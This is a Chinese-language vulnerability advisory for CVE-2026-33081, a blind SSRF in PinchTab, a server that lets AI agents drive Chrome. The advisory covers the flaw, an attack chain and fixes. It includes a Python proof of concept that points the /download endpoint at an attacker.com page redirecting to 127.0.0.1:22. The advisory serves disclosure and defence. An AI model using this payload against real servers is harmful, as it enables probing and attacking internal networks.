IPBUF安全漏洞报告
English
CVE-2026-33081 CVSS 5.8 中危

CVE-2026-33081 PinchTab 盲SSRF漏洞

披露日期: 2026-03-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33081
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
5.8 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
PinchTab

相关标签

SSRFPinchTabBlind SSRFChromeCVE-2026-33081

漏洞概述

PinchTab是一个允许AI代理控制Chrome浏览器的HTTP服务器。在0.8.2及以下版本中,系统存在盲SSRF漏洞。由于`validateDownloadURL()`函数仅验证初始URL,未能阻止嵌入式Chromium浏览器跟随攻击者控制的JavaScript重定向。攻击者可利用此漏洞,在`security.allowDownload=true`开启的情况下,诱导服务器访问内部网络地址,从而探测或攻击内网服务。该问题已在0.8.3版本中修复。

技术细节

该漏洞的核心在于服务器端验证与浏览器行为之间的逻辑不一致。当PinchTab接收到`/download`请求时,`validateDownloadURL()`仅检查传入的URL是否合法,随后将其交给Chromium引擎处理。攻击者可构造一个恶意URL指向其控制的服务器,该服务器返回包含JavaScript重定向代码(如`window.location='http://internal-ip'`)的页面。由于Chromium会解析并执行此类脚本,PinchTab将作为代理向内网地址发起请求。尽管该功能默认关闭,但一旦启用,攻击者即可利用此盲SSRF漏洞扫描内网端口或访问受限的内部API。

攻击链分析

STEP 1
步骤1:构造恶意页面
攻击者准备一个包含JavaScript重定向代码的恶意网页(如重定向至127.0.0.1)。
STEP 2
步骤2:发送恶意请求
攻击者向PinchTab的/download端点发送请求,URL参数指向上述恶意页面。
STEP 3
步骤3:验证与加载
PinchTab验证初始URL通过后,启动Chromium浏览器加载该恶意页面。
STEP 4
步骤4:触发重定向
恶意页面中的JavaScript执行,引导Chromium浏览器向内部网络地址(如内网管理后台)发起请求。
STEP 5
步骤5:SSRF利用
PinchTab作为代理访问内网资源,导致信息泄露或内网探测。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Exploit PoC for CVE-2026-33081 # This script demonstrates how an attacker could trigger the SSRF. # Assume the attacker controls http://attacker.com/redirect.html import requests # Target configuration target_url = "http://vulnerable-pinchtab-server:8080/download" malicious_url = "http://attacker.com/redirect.html" # The content of attacker.com/redirect.html: # <html><script>window.location="http://127.0.0.1:22";</script></html> payload = { "url": malicious_url } print(f"Sending request to {target_url} with payload: {payload}") try: response = requests.post(target_url, json=payload) if response.status_code == 200: print("Request accepted. The browser will now follow the redirect to internal service.") else: print(f"Request failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

影响范围

PinchTab <= 0.8.2

防御指南

临时缓解措施
建议立即将PinchTab组件升级到v0.8.3或更高版本以修复此漏洞。在未升级前,请检查配置文件,确保`security.allowDownload`选项未被错误地设置为`true`,从而防止攻击者利用/download端点进行内网探测。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表